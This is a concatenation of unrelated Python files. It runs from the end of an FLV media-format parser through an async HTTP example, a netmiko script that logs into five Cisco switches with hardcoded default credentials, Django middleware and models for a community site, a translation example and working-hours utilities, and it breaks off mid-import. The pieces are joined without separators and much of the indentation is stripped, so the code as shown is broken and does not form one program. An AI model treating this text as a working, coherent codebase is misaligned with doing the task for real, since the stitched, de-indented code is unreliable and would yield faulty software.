count = blocks_w * blocks_h
return dyn.array(self.IMAGEBLOCKV2, math.trunc(count))
def __IFrameImage(self):
w,h = self['Width'],self['Height']
blocks_w = math.ceil(w['Image'] / float(w['Block']))
blocks_h = math.ceil(h['Image'] / float(h['Block']))
count = blocks_w * blocks_h
return dyn.array(self.IMAGEBLOCKV2, math.trunc(count))
_fields_ = [
(SCREENVIDEOPACKET.Dim, 'Width'),
(SCREENVIDEOPACKET.Dim, 'Height'),
(Flags, 'Flags'),
(lambda s: s['Flags'].li['HasPaletteInfo'] and SCREENVIDEOPACKET.IMAGEBLOCK or ptype.block, 'PaletteInfo'),
(__ImageBlocks, 'ImageBlocks'),
(__IFrameImage, 'IFrameImage'),
]
@VideoPacketData.define
class AVCVIDEOPACKET(pstruct.type):
"""AVC"""
type = 7
def __Data(self):
        # the codec-specific header (AVCVIDEOPACKETHEADER) hangs off VideoTagHeader['Header']
        h = self.getparent(StreamTag)['Header']
        t = h['Header']['AVCPacketType'].int()
if t == 0:
# FIXME: ISO 14496-15, 5.2.4.1
return AVCDecoderConfigurationRecord
elif t == 1:
# FIXME: avcC
return NALU
return ptype.block
_fields_ = [
(__Data, 'Data')
]
### SCRIPTDATA
class SCRIPTDATAVALUE(pstruct.type):
def __ScriptDataValue(self):
t = self['Type'].li.int()
return SCRIPTDATATYPE.withdefault(t, type=t)
_fields_ = [
(UI8,'Type'),
(__ScriptDataValue, 'Value'),
]
def summary(self):
return '{:s}({:d})/{:s}'.format(self['Value'].classname(), self['Type'].int(), self['Value'].summary())
repr = summary
class SCRIPTDATATYPE(ptype.definition): cache = {}
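# SCRIPTDATA values follow the AMF0-style encoding used for FLV metadata: a
# one-byte type marker (read by SCRIPTDATAVALUE above) selects one of the
# concrete value classes registered below via @SCRIPTDATATYPE.define.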
class SCRIPTDATASTRING(pstruct.type):
_fields_ = [(UI16,'StringLength'),(lambda s:dyn.clone(STRING,length=s['StringLength'].li.int()),'StringData')]
def summary(self):
return self['StringData'].summary()
repr = summary
class SCRIPTDATAOBJECTPROPERTY(pstruct.type):
_fields_ = [(SCRIPTDATASTRING,'Name'),(SCRIPTDATAVALUE,'Value')]
def summary(self):
        return '{:s}={:s}'.format(self['Name'].summary(), self['Value'].summary())
repr = summary
# FIXME
@TagBody.define
class ScriptTagBody(pstruct.type):
type = 18
_fields_ = [(SCRIPTDATAVALUE,'Name'),(SCRIPTDATAVALUE,'Value')]
def summary(self):
return 'Name:{:s} Value:{:s}'.format(self['Name'].summary(), self['Value'].summary())
repr = summary
@SCRIPTDATATYPE.define
class DOUBLE(DOUBLE):
type = 0
@SCRIPTDATATYPE.define
class UI8(UI8):
type = 1
@SCRIPTDATATYPE.define
class SCRIPTDATASTRING(SCRIPTDATASTRING):
type = 2
@SCRIPTDATATYPE.define
class SCRIPTDATAOBJECT(parray.terminated):
type = 3
_object_ = SCRIPTDATAOBJECTPROPERTY
def isTerminator(self, value):
return type(value['Value'].li['Value']) == SCRIPTDATAOBJECTEND
#return value['PropertyName'].li['StringLength'] == 0 and value['PropertyValue'].li['Type'].int() == SCRIPTDATAOBJECTEND.type
def summary(self):
return repr([ x.summary() for x in self ])
repr = summary
@SCRIPTDATATYPE.define
class UI16(UI16):
type = 7
@SCRIPTDATATYPE.define
class SCRIPTDATAECMAARRAY(pstruct.type):
type = 8
_fields_ = [
(UI32,'EcmaArrayLength'),
(SCRIPTDATAOBJECT, 'Variables'),
]
@SCRIPTDATATYPE.define
class SCRIPTDATAOBJECTEND(ptype.type):
type = 9
@SCRIPTDATATYPE.define
class SCRIPTDATASTRICTARRAY(pstruct.type):
type = 10
    _fields_ = [(UI32,'StrictArrayLength'),(lambda s: dyn.array(SCRIPTDATAVALUE, s['StrictArrayLength'].li.int()),'StrictArrayValue')]
def summary(self):
return '{!r}'.format([x.summary() for x in self['StrictArrayValue']])
repr = summary
@SCRIPTDATATYPE.define
class SCRIPTDATADATE(pstruct.type):
type = 11
_fields_ = [(DOUBLE,'DateTime'),(SI16,'LocalDateTimeOffset')]
def summary(self):
return 'DataTime:{:s} LocalDateTimeOffset:{:d}'.format(self['DateTime'].summary(), self['LocalDateTimeOffset'].int())
repr = summary
@SCRIPTDATATYPE.define
class SCRIPTDATALONGSTRING(pstruct.type):
type = 12
_fields_ = [
(UI32, 'StringLength'),
(lambda s: dyn.clone(STRING,length=s['StringLength'].li.int()), 'StringData'),
]
def summary(self):
return self['StringData'].str()
repr = summary
### Structures
class StreamTag(pstruct.type):
def __Header(self):
base = self.getparent(FLVTAG)
t = base['Type'].li['TagType']
return TagHeader.withdefault(t, type=t)
def __FilterParams(self):
base = self.getparent(FLVTAG)
return FilterParams if base['Type'].li['Filter'] == 1 else ptype.undefined
def __Body(self):
base = self.getparent(FLVTAG)
t = base['Type'].li['TagType']
return TagBody.withdefault(t, type=t, length=self.DataSize())
def DataSize(self):
base = self.getparent(FLVTAG)
sz = base['DataSize'].li.int()
ex = self['Header'].li.size() + self['FilterParams'].li.size()
return sz - ex
_fields_ = [
(__Header, 'Header'),
(__FilterParams, 'FilterParams'),
(__Body, 'Body'),
]
class EncryptionTagHeader(pstruct.type):
_fields_ = [
(UI8, 'NumFilters'),
(STRING, 'FilterName'),
(UI24, 'Length'),
]
class EncryptionFilterParams(pstruct.type):
_fields_ = [(dyn.array(UI8,16), 'IV')]
class SelectiveEncryptionFilterParams(pbinary.struct):
_fields_ = [(1,'EncryptedAU'),(7,'Reserved'),(lambda s: dyn.clone(pbinary.array,length=16,_object_=8),'IV')]
class FilterParams(pstruct.type):
def __FilterParams(self):
header = self.getparent(EncryptionTagHeader)
filtername = header['FilterName'].li.str()
if filtername == 'Encryption':
return EncryptionFilterParams
if filtername == 'SE':
return SelectiveEncryptionFilterParams
return ptype.undefined
_fields_ = [
(__FilterParams, 'FilterParams'),
]
class FLVTAG(pstruct.type):
class Type(pbinary.struct):
_fields_ = [(2,'Reserved'),(1,'Filter'),(5,'TagType')]
def summary(self):
return 'TagType:{:d} {:s}Reserved:{:d}'.format(self['TagType'], 'Filtered ' if self['Filter'] else '', self['Reserved'])
def __Extra(self):
sz = self['DataSize'].li.int()
ts = self['Stream'].li.size()
return dyn.block(sz-ts)
_fields_ = [
(Type, 'Type'),
(UI24, 'DataSize'),
(UI24, 'Timestamp'),
(UI8, 'TimestampExtended'),
(UI24, 'StreamID'),
(StreamTag, 'Stream'),
(__Extra, 'Extra'),
]
### file types
class File(pstruct.type):
class Header(pstruct.type):
class TypeFlags(pbinary.struct):
_fields_ = [(5,'Reserved(0)'),(1,'Audio'),(1,'Reserved(1)'),(1,'Video')]
def summary(self):
res = []
if self['Audio']: res.append('Audio')
if self['Video']: res.append('Video')
if self['Reserved(1)'] or self['Reserved(0)']: res.append('Reserved?')
return '/'.join(res)
def __Padding(self):
sz = self['DataOffset'].li.int()
return dyn.block(sz - 9)
_fields_ = [
(dyn.array(UI8,3), 'Signature'),
(UI8, 'Version'),
(TypeFlags, 'TypeFlags'),
(UI32, 'DataOffset'),
(__Padding, 'Padding'),
]
def __Padding(self):
h = self['Header'].li
sz = h['DataOffset'].int()
return dyn.block(sz - h.size())
class Body(parray.block):
class _object_(pstruct.type):
_fields_ = [
(UI32, 'PreviousTagSize'),
(FLVTAG, 'Tag'),
]
def __Body(self):
ex = self['Header'].li['DataOffset'].int()
return dyn.clone(self.Body, blocksize=lambda s:self.source.size() - ex)
_fields_ = [
(Header, 'Header'),
(__Body, 'Body'),
]
if __name__ == '__main__':
import ptypes,swf.flv as flv
ptypes.setsource(ptypes.prov.file('c:/users/user/Documents/blah.flv',mode='rb'))
a = flv.File()
a = a.l
print(a['Header']['TypeFlags'])
print(a['Header'])
print(a['Header']['Padding'].hexdump())
print(a['Body'][0]['Tag'])
    print(a['Body'][0]['Tag']['Stream'])
# This should work on python 3.6+
import ahip
URL = "http://httpbin.org/uuid"
async def main(backend=None):
with ahip.PoolManager(backend=backend) as http:
print("URL:", URL)
r = await http.request("GET", URL, preload_content=False)
print("Status:", r.status)
print("Data:", await r.read())
print("--- Trio ---")
import trio
trio.run(main)
print("\n--- asyncio (via AnyIO) ---")
import asyncio
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
loop.close()
print("\n--- Curio (via AnyIO) ---")
import curio
curio.run(main)
#!/usr/bin/env python
from netmiko import ConnectHandler
iosv_l2_SW5 = {
'device_type': 'cisco_ios',
'ip': '192.168.10.100',
'username': 'admin',
'password': 'cisco',
}
iosv_l2_SW1 = {
'device_type': 'cisco_ios',
'ip': '192.168.10.101',
'username': 'admin',
'password': 'cisco',
}
iosv_l2_SW2 = {
'device_type': 'cisco_ios',
'ip': '192.168.10.102',
'username': 'admin',
'password': 'cisco',
}
iosv_l2_SW3 = {
'device_type': 'cisco_ios',
'ip': '192.168.10.103',
'username': 'admin',
'password': 'cisco',
}
iosv_l2_SW4 = {
'device_type': 'cisco_ios',
'ip': '192.168.10.104',
'username': 'admin',
'password': 'cisco',
}
all_devices = [iosv_l2_SW3, iosv_l2_SW4, iosv_l2_SW2, iosv_l2_SW1, iosv_l2_SW5]
for device in all_devices:
    net_connect = ConnectHandler(**device)
    output = net_connect.send_command('wr mem')
    print(output)
    # close the SSH session so connections do not pile up on the devices
    net_connect.disconnect()
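# Alternative sketch: netmiko connections can also be used as context managers,
# which disconnects automatically even if a command raises, e.g.
#
#     with ConnectHandler(**device) as conn:
#         print(conn.send_command('wr mem'))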
from django.conf import settings
from django.utils.deprecation import MiddlewareMixin
from django.utils.functional import SimpleLazyObject
from mediawiki_auth import mediawiki
def get_user(request):
if not hasattr(request, '_cached_user'):
request._cached_user = mediawiki.get_or_create_django_user(request)
return request._cached_user
class AuthenticationMiddleware(MiddlewareMixin):
def process_request(self, request):
assert hasattr(request, 'session'), (
"The Django authentication middleware requires session middleware "
"to be installed. Edit your MIDDLEWARE%s setting to insert "
"'django.contrib.sessions.middleware.SessionMiddleware' before "
"'django.contrib.auth.middleware.AuthenticationMiddleware'."
) % ("_CLASSES" if settings.MIDDLEWARE is None else "")
request.user = SimpleLazyObject(lambda: get_user(request))
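# Usage sketch (the module path below is an assumption -- adjust it to wherever
# this file actually lives): list this middleware after Django's session
# middleware in settings.MIDDLEWARE, e.g.
#
#     MIDDLEWARE = [
#         ...,
#         'django.contrib.sessions.middleware.SessionMiddleware',
#         'mediawiki_auth.middleware.AuthenticationMiddleware',
#         ...,
#     ]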
"""
Module to run something
"""
def hello_world(message='Hello World'):
"""
Print demo message to stdout
"""
print(message)
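if __name__ == '__main__':
    # simple smoke test when the module is executed directly
    hello_world()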
"""
This example shows how EasyNMT can be used for sentence translation
"""
import datetime
from easynmt import EasyNMT
sentences = [
# '薄雾',
# 'Voici un exemple d\'utilisation d\'EasyNMT.', # 'This is an example how to use EasyNMT.',
'南瓜人?',
# 'Cada frase es luego traducida al idioma de destino seleccionado.',
# 'Each sentences is then translated to your chosen target language.',
# 'On our website, you can find various translation models.',
# 'New York City (NYC), often called simply New York, is the most populous city in the United States.',
# 'PyTorch is an open source machine learning library based on the Torch library, used for applications such as computer vision and natural language processing, primarily developed by Facebook\'s AI Research lab (FAIR).',
# 'A deep neural network (DNN) is an artificial neural network (ANN) with multiple layers between the input and output layers.'
]
target_lang = 'en'   # We want to translate the sentences to English (en)
source_lang = 'zh'   # The source sentences are Chinese (zh)
# model = EasyNMT('opus-mt')
model = EasyNMT('m2m_100_418M')
# model = EasyNMT('m2m_100_1.2B')
print(datetime.datetime.now())
translations = model.translate(sentences, target_lang=target_lang, source_lang=source_lang, batch_size=8, beam_size=3)
print(translations)
print(datetime.datetime.now())
from . import argument_magics as _args
from . import data_magics as _data
from .list_magic import L as _LType
from .seq_magic import N as _NType
# Argument magics
X_i = _args.X_i()
F = _args.F()
# Sequence type
N = _NType()
# Data magics
L = _LType()
D = _data.D()
S = _data.S()
B = _data.B()
T = _data.T()
"""
Utility functions related to actual working times.
"""
from __future__ import annotations
import datetime
from collections import defaultdict
from typing import Any, Dict, Optional, Tuple
from annoworkapi.utils import datetime_to_str, str_to_datetime
_ActualWorkingHoursDict = Dict[Tuple[datetime.date, str, str], float]
"""実績作業時間の日ごとの情報を格納する辞書
key: (date, workspace_member_id, job_id), value: 実績作業時間
"""
def get_term_start_end_from_date_for_actual_working_time(
start_date: Optional[str], end_date: Optional[str], tzinfo: Optional[datetime.tzinfo] = None
) -> tuple[Optional[str], Optional[str]]:
"""開始日と終了日から、実績作業時間を取得するAPIに渡すクエリパラメタterm_startとterm_endを返します。
Args:
start_date: 開始日
end_date: 終了日
tzinfo: 指定した日付のタイムゾーン。Noneの場合は、システムのタイムゾーンとみなします。
Notes:
WebAPIの絞り込み条件が正しくない恐れがあります。
Returns:
実績作業時間を取得するAPIに渡すterm_startとterm_end
"""
if tzinfo is None:
        # use the system timezone
tzinfo = datetime.datetime.now().astimezone().tzinfo
term_start: Optional[str] = None
if start_date is not None:
dt_local_start_date = datetime.datetime.fromisoformat(start_date).replace(tzinfo=tzinfo)
term_start = datetime_to_str(dt_local_start_date)
term_end: Optional[str] = None
if end_date is not None:
dt_local_end_date = datetime.datetime.fromisoformat(end_date).replace(tzinfo=tzinfo)
        # if end_date is "2021-01-02", term_end should become "2021-01-02T23:59:59.999"
        # WARNING: this matches the current WebAPI behavior and may change in the future
tmp = dt_local_end_date + datetime.timedelta(days=1) - datetime.timedelta(microseconds=1000)
term_end = datetime_to_str(tmp)
return term_start, term_end
def _create_actual_working_hours_dict(actual: dict[str, Any], tzinfo: datetime.tzinfo) -> _ActualWorkingHoursDict:
results_dict: _ActualWorkingHoursDict = {}
dt_local_start_datetime = str_to_datetime(actual["start_datetime"]).astimezone(tzinfo)
dt_local_end_datetime = str_to_datetime(actual["end_datetime"]).astimezone(tzinfo)
workspace_member_id = actual["workspace_member_id"]
job_id = actual["job_id"]
if dt_local_start_datetime.date() == dt_local_end_datetime.date():
actual_working_hours = (dt_local_end_datetime - dt_local_start_datetime).total_seconds() / 3600
results_dict[(dt_local_start_datetime.date(), workspace_member_id, job_id)] = actual_working_hours
else:
dt_tmp_local_start_datetime = dt_local_start_datetime
            # a single entry should never exceed 24 hours, but handle that case correctly anyway
while dt_tmp_local_start_datetime.date() < dt_local_end_datetime.date():
dt_next_date = dt_tmp_local_start_datetime.date() + datetime.timedelta(days=1)
dt_tmp_local_end_datetime = datetime.datetime(
year=dt_next_date.year, month=dt_next_date.month, day=dt_next_date.day, tzinfo=tzinfo
)
actual_working_hours = (dt_tmp_local_end_datetime - dt_tmp_local_start_datetime).total_seconds() / 3600
results_dict[(dt_tmp_local_start_datetime.date(), workspace_member_id, job_id)] = actual_working_hours
dt_tmp_local_start_datetime = dt_tmp_local_end_datetime
actual_working_hours = (dt_local_end_datetime - dt_tmp_local_start_datetime).total_seconds() / 3600
results_dict[(dt_local_end_datetime.date(), workspace_member_id, job_id)] = actual_working_hours
return results_dict
def create_actual_working_times_daily(
actual_working_times: list[dict[str, Any]], tzinfo: Optional[datetime.tzinfo] = None
) -> list[dict[str, Any]]:
"""`getActualWorkingTimes` APIなどで取得した実績時間のlistから、日付、ジョブ、メンバ単位で集計した実績時間を生成します。
Args:
actual_working_times: `getActualWorkingTimes` APIなどで取得した実績時間のlist
tzinfo: 日付を決めるためのタイムゾーン。未指定の場合はシステムのタイムゾーンを参照します。
Returns:
日付、ジョブ、メンバ単位で集計した実績時間のlistを返します。listの要素はdictで以下のキーを持ちます。
* date
* job_id
* workspace_member_id
* actual_working_hours
"""
results_dict: _ActualWorkingHoursDict = defaultdict(float)
tmp_tzinfo = tzinfo if tzinfo is not None else datetime.datetime.now().astimezone().tzinfo
assert tmp_tzinfo is not None
for actual in actual_working_times:
tmp_results = _create_actual_working_hours_dict(actual, tzinfo=tmp_tzinfo)
for key, value in tmp_results.items():
results_dict[key] += value
results_list: list[dict[str, Any]] = []
for (date, workspace_member_id, job_id), actual_working_hours in results_dict.items():
        # entries with zero actual working hours carry no information, so skip them
if actual_working_hours > 0:
results_list.append(
dict(
date=str(date),
workspace_member_id=workspace_member_id,
job_id=job_id,
actual_working_hours=actual_working_hours,
)
)
return results_list
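# Usage sketch (hypothetical data; the datetime strings are assumed to be the
# ISO-8601 format handled by ``str_to_datetime``). An entry that spans midnight
# is split per day:
#
#     actual = [{
#         "workspace_member_id": "alice",
#         "job_id": "job1",
#         "start_datetime": "2022-01-01T22:00:00.000Z",
#         "end_datetime": "2022-01-02T01:00:00.000Z",
#     }]
#     create_actual_working_times_daily(actual, tzinfo=datetime.timezone.utc)
#     # -> [{"date": "2022-01-01", "workspace_member_id": "alice",
#     #      "job_id": "job1", "actual_working_hours": 2.0},
#     #     {"date": "2022-01-02", "workspace_member_id": "alice",
#     #      "job_id": "job1", "actual_working_hours": 1.0}]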
from __future__ import unicode_literals
from django_markdown.models import MarkdownField
from django.db import models
from django.contrib.auth.models import User
from taggit.managers import TaggableManager
from taggit.models import TaggedItemBase
from django.conf import settings
import os
#this will store the extra profile details of the user
class UserProfileModel(models.Model):
user = models.OneToOneField(User)
user_description = MarkdownField()
skills = TaggableManager()
user_type_select = models.CharField(max_length = 50,default = 'None')
programme = models.CharField(max_length = 15)
branch = models.CharField(max_length = 100)
college_year = models.CharField(max_length = 10)
graduation_year = models.CharField(max_length = 4)
user_profile_pic = models.FileField(upload_to = 'profile_pics/',blank = True,default = 'profile_pics/avatars/default.png')
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
def __str__(self):
return self.user.username
class CodehubTopicModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
topic_heading = models.CharField(max_length = 100)
topic_detail = MarkdownField()
topic_link = models.CharField(max_length = 100,blank = True)
tags = TaggableManager()
topic_type = models.CharField(max_length = 10)
file = models.FileField(upload_to = 'uploads/',blank = True)
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
def __str__(self):
return self.topic_heading
def delete(self,*args,**kwargs):
        print('in the delete function of codehub model')
if self.file:
file_path = os.path.join(settings.MEDIA_ROOT,self.file.name)
            print(file_path)
if os.path.isfile(file_path):
os.remove(file_path)
super(CodehubTopicModel,self).delete(*args,**kwargs)
class CodehubTopicCommentModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
topic = models.ForeignKey('CodehubTopicModel')
comment_text = MarkdownField()
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
def __str__(self):
return self.topic.topic_heading
class CodehubCreateEventModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
event_heading = models.CharField(max_length = 100)
event_date = models.DateTimeField(null = True,blank = True)
event_venue = models.CharField(max_length = 100)
event_description = MarkdownField()
event_for = models.CharField(max_length = 25)#basic or advanced
tags = TaggableManager()
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
def __str__(self):
return self.event_heading
class CodehubEventQuestionModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
event = models.ForeignKey(CodehubCreateEventModel)
question_text = MarkdownField()
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
class MusicModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
music_name = models.CharField(max_length = 100)
music_file = models.FileField(upload_to = 'music/')
music_lang = models.CharField(max_length = 20)
music_artist = models.CharField(max_length = 30)
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
def __str__(self):
return self.music_name
class CodehubQuestionModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
question_heading = models.CharField(max_length = 200)
question_description = MarkdownField()
question_link = models.CharField(max_length = 100,blank = True)
question_tags = TaggableManager()
question_type = models.CharField(max_length = 20)
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
def __str__(self):
return self.question_heading
class CodehubQuestionCommentModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
question = models.ForeignKey(CodehubQuestionModel)
comment_text = MarkdownField()
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
def __str__(self):
return self.question.question_heading
class BlogPostModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
title = models.CharField(max_length = 200)
body = MarkdownField()
tags = TaggableManager()
image_file = models.FileField(upload_to = 'blog_images/',blank = True)
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
views_count = models.CharField(max_length = 15, default = 0)
def __str__(self):
return self.title
def delete(self,*args,**kwargs):
        print('In the delete function of the BlogPostModel')
if self.image_file:
file_path = os.path.join(settings.MEDIA_ROOT,self.image_file.name)
if os.path.isfile(file_path):
os.remove(file_path)
super(BlogPostModel,self).delete(*args,**kwargs)
class BlogPostCommentModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
blog_post = models.ForeignKey(BlogPostModel)
comment_text = MarkdownField()
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
def __str__(self):
return self.comment_text
class CodehubInnovationPostModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
title = models.CharField(max_length = 200)
description = MarkdownField()
tags = TaggableManager()
vote = models.CharField(max_length = 100,default = 0)
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
def __str__(self):
return self.title
class CodehubInnovationCommentModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
innovation_post = models.ForeignKey(CodehubInnovationPostModel)
comment_text = MarkdownField()
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
def __str__(self):
return self.comment_text
class DevhubQuestionModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
question_heading = models.CharField(max_length = 200)
question_description = MarkdownField()
question_link = models.CharField(max_length = 100,blank = True)
question_tags = TaggableManager()
question_type = models.CharField(max_length = 20)
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
def __str__(self):
return self.question_heading
class DevhubQuestionAnswerModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
question = models.ForeignKey(DevhubQuestionModel)
answer_text = MarkdownField()
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
class DevhubTopicModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
topic_heading = models.CharField(max_length = 100)
topic_detail = MarkdownField()
topic_link = models.CharField(max_length = 100,blank = True)
tags = TaggableManager()
file = models.FileField(upload_to = 'devhub/',blank = True)
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
def __str__(self):
return self.topic_heading
def delete(self,*args,**kwargs):
        print('in the delete function of devhub model')
if self.file:
file_path = os.path.join(settings.MEDIA_ROOT,self.file.name)
            print(file_path)
if os.path.isfile(file_path):
os.remove(file_path)
super(DevhubTopicModel,self).delete(*args,**kwargs)
class DevhubTopicCommentModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
topic = models.ForeignKey(DevhubTopicModel)
comment_text = MarkdownField()
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
def __str__(self):
return self.topic.topic_heading
class DevhubProjectModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
project_heading = models.CharField(max_length = 200)
project_description = MarkdownField()
project_link = models.CharField(max_length = 100,blank = True)
tags = TaggableManager()
class FollowUserModel(models.Model):
# following_user = models.CharField(max_length = 10) #user who is following
following_user = models.ForeignKey(User,related_name = 'following_user')
followed_user = models.ForeignKey(User,related_name = 'followed_user') #user being followed
following_user_profile = models.ForeignKey(UserProfileModel,related_name = 'following_user_profile')
followed_user_profile = models.ForeignKey(UserProfileModel,related_name = 'followed_user_profile')
class ProposeEventModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
event_heading = models.CharField(max_length = 200)
event_description = MarkdownField()
tags = TaggableManager()
event_type = models.CharField(max_length = 30)
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
class ProposeEventVoteModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
event = models.ForeignKey(ProposeEventModel)
vote = models.CharField(max_length = 10)
class ProposeEventSuggestionModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
event = models.ForeignKey(ProposeEventModel)
sugg_text = models.CharField(max_length = 500)
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
#host_project section starts here
class HostProjectModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
project_name = models.CharField(max_length = 200)
project_description = MarkdownField()
skills = TaggableManager()
project_status = models.CharField(max_length = 15,default = 'active')
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
class PingHostProjectModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
hosted_project = models.ForeignKey(HostProjectModel)
ping_status = models.CharField(max_length = 20,default = 'waiting')
created = models.DateTimeField(auto_now_add = True)
class HostProjectQuestionModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
project = models.ForeignKey(HostProjectModel)
question_text = models.CharField(max_length = 500)
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
class MesssageModel(models.Model):
sender = models.ForeignKey(User,related_name = 'sender')
receiver = models.ForeignKey(User,related_name = 'receiver')
sender_profile = models.ForeignKey(UserProfileModel,related_name = 'sender_profile')
receiver_profile = models.ForeignKey(UserProfileModel,related_name = 'receiver_profile')
message_text = models.CharField(max_length = 500)
message_status = models.CharField(max_length = 5,default = 'False')
created = models.DateTimeField(auto_now_add = True)
#the info section comes here
class TaggedInfoAddQuery(TaggedItemBase):
content_object = models.ForeignKey('TheInfoAddQueryModel')
class TheInfoAddQueryModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
queryText = models.CharField(max_length = 200)
queryTags = TaggableManager(through = TaggedInfoAddQuery)
created = models.DateTimeField(auto_now_add = True)
class TheInfoQueryAnswerModel(models.Model):
info_query = models.ForeignKey(TheInfoAddQueryModel)
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
answer_text = models.CharField(max_length = 200)
class TheInfoQueryAnswerVoteModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
answer = models.ForeignKey(TheInfoQueryAnswerModel)
class GeneralQuestionModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
ques_text = MarkdownField()
ques_tags = TaggableManager()
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
class GeneralQuestionAnswerModel(models.Model):
question = models.ForeignKey(GeneralQuestionModel)
answer_text = MarkdownField()
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
class CreateUserGroupModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
group_name = models.CharField(max_length = 50)
group_description = MarkdownField()
group_tags = TaggableManager()
group_status = models.CharField(max_length = 15,default = 'active') #other option is deactive
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
#create track of the user request to join a particular group
class GroupUsersInterestTrackModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
group = models.ForeignKey(CreateUserGroupModel)
request_status = models.CharField(max_length = 15)
created = models.DateTimeField(auto_now_add = True)
class GroupUserCommentModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
group = models.ForeignKey(CreateUserGroupModel)
comment_text = models.CharField(max_length = 150,blank = False)
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
class DevhubCreateEventModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
event_heading = models.CharField(max_length = 100)
event_date = models.DateTimeField(null = True,blank = True)
event_venue = models.CharField(max_length = 100)
event_description = MarkdownField()
event_for = models.CharField(max_length = 25)#basic or advanced
tags = TaggableManager()
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
def __str__(self):
return self.event_heading
class DevhubEventQuestionModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
event = models.ForeignKey(CodehubCreateEventModel)
question_text = MarkdownField()
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
"""
Models for storing the user's different social accounts.
"""
class UserSocialAccountModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
social_profile_name = models.CharField(max_length = 50)
social_profile_link = models.CharField(max_length = 100)
import xsimlab as xs
from ..processes.boundary import BorderBoundary
from ..processes.channel import (StreamPowerChannel,
DifferentialStreamPowerChannelTD)
from ..processes.context import FastscapelibContext
from ..processes.flow import DrainageArea, SingleFlowRouter, MultipleFlowRouter
from ..processes.erosion import TotalErosion
from ..processes.grid import RasterGrid2D
from ..processes.hillslope import LinearDiffusion, DifferentialLinearDiffusion
from ..processes.initial import (BareRockSurface,
Escarpment,
FlatSurface,
NoErosionHistory)
from ..processes.main import (Bedrock,
StratigraphicHorizons,
SurfaceTopography,
SurfaceToErode,
TerrainDerivatives,
TotalVerticalMotion,
